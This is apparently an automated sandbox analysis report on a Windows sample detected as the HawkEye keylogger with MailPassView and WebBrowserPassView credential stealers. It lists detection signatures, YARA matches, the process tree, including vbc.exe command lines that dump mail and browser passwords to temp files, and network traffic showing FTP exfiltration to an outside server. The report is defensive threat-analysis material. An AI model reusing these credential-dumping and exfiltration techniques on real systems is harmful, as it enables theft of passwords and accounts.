Windows Analysis Report
TGQfHfehsY

Overview

General Information

Sample Name: TGQfHfehsY (renamed file extension from none to exe)
Analysis ID: 587288
MD5: 9b8ec9e094676d88b02f038f318afd86
SHA1: 65f99e529982f1c1a5cf9eb59f60edfeecdf2eec
SHA256: 54fa4651e925e0fd845ca5652d57a010c26e4ab799211b8d3299cbb7dec35ae8
Tags: exe

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected MailPassView
Yara detected HawkEye Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected HawkEye Rat
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapter information

Classification

  • System is w10x64
  • TGQfHfehsY.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\TGQfHfehsY.exe" MD5: 9B8EC9E094676D88B02F038F318AFD86)
    • pjavpo.exe (PID: 6660 cmdline: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja MD5: 1294A9DDC96CAC3F16FAE32EA9D6670D)
      • pjavpo.exe (PID: 6720 cmdline: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja MD5: 1294A9DDC96CAC3F16FAE32EA9D6670D)
        • vbc.exe (PID: 580 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 5484 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b748:$key: HawkEyeKeylogger
  • 0x7d946:$salt: 099u787978786
  • 0x7bd61:$string1: HawkEye_Keylogger
  • 0x7cbb4:$string1: HawkEye_Keylogger
  • 0x7d8a6:$string1: HawkEye_Keylogger
  • 0x7c14a:$string2: holdermail.txt
  • 0x7c16a:$string2: holdermail.txt
  • 0x7c08c:$string3: wallet.dat
  • 0x7c0a4:$string3: wallet.dat
  • 0x7c0ba:$string3: wallet.dat
  • 0x7d488:$string4: Keylog Records
  • 0x7d7a0:$string4: Keylog Records
  • 0x7d99e:$string5: do not script -->
  • 0x7b730:$string6: \pidloc.txt
  • 0x7b796:$string7: BSPLIT
  • 0x7b7a6:$string7: BSPLIT
00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
Source | Rule | Description | Author | Strings
5.2.pjavpo.exe.7bf0000.21.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.0.pjavpo.exe.400000.0.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x1b67b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.pjavpo.exe.4a29c0d.17.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
13.0.vbc.exe.400000.3.raw.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
5.0.pjavpo.exe.41ce65.15.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\TGQfHfehsY.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Local\Temp\pjavpo.exe
Source: Process started | Author: frack113 | Data: Command: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, CommandLine: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\pjavpo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\pjavpo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\pjavpo.exe, ParentCommandLine: "C:\Users\user\Desktop\TGQfHfehsY.exe", ParentImage: C:\Users\user\Desktop\TGQfHfehsY.exe, ParentProcessId: 6544, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, ProcessId: 6660

                AV Detection

Source: TGQfHfehsY.exe | Virustotal: Detection: 32%
Source: 3.2.pjavpo.exe.20e0000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.0.pjavpo.exe.415058.10.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.0.pjavpo.exe.400000.0.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.2.pjavpo.exe.4a20000.16.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.pjavpo.exe.4a20000.16.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 5.2.pjavpo.exe.4990000.15.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.2.pjavpo.exe.3803258.6.unpack | Avira: Label: TR/Inject.vcoldi
Source: 12.0.vbc.exe.400000.1.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 5.0.pjavpo.exe.400000.2.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.0.pjavpo.exe.415058.14.unpack | Avira: Label: TR/Inject.vcoldi
Source: 12.0.vbc.exe.400000.4.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 3.2.pjavpo.exe.20f1458.2.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.2.pjavpo.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.pjavpo.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 5.0.pjavpo.exe.400000.3.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.2.pjavpo.exe.415058.3.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.0.pjavpo.exe.400000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 12.0.vbc.exe.400000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 12.0.vbc.exe.400000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 12.0.vbc.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: unknown | HTTPS traffic detected: 104.16.154.36:443 -> 192.168.2.4:49772 version: TLS 1.0
Source: TGQfHfehsY.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Binary string: C:\gfzfo\jdgvpo\ilxz\eb80024cfd9a4588b9c5c2bbb297cb83\uledka\mpuuwnfg\Release\mpuuwnfg.pdb source: TGQfHfehsY.exe, 00000001.00000002.265684302.000000000040B000.00000004.00000001.01000000.00000003.sdmp, pjavpo.exe, 00000003.00000000.229757777.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000003.00000002.245881929.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000005.00000000.232538937.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe.1.dr
                Source: Binary string: wntdll.pdbUGP source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe | Binary or memory string: [autorun]
Source: pjavpo.exe | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: [autorun]
Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: C:\Users\user\Desktop\TGQfHfehsY.exe | Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\TGQfHfehsY.exe | Code function: 1_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\TGQfHfehsY.exe | Code function: 1_2_00402630 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | Code function: 5_2_00404A29 FindFirstFileExW,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 12_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 13_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 13_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | Code function: 4x nop then jmp 02301A73h
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | Code function: 4x nop then call 02301B20h

                Networking

Source: Traffic | Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.4:49782 -> 66.70.204.222:21
Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe | DNS query: name: whatismyipaddress.com
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.16.154.36:443 -> 192.168.2.4:49772 version: TLS 1.0
Source: Joe Sandbox View | IP Address: 104.16.154.36
Source: global traffic | TCP traffic: 192.168.2.4:49783 -> 66.70.204.222:59592
Source: unknown | FTP traffic detected: 66.70.204.222:21 -> 192.168.2.4:49782
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 6 of 50 allowed.
  220-Local time is now 14:57. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ywNG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: TGQfHfehsY.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: TGQfHfehsY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0B
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0E
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0F
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0K
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0M
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0R
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
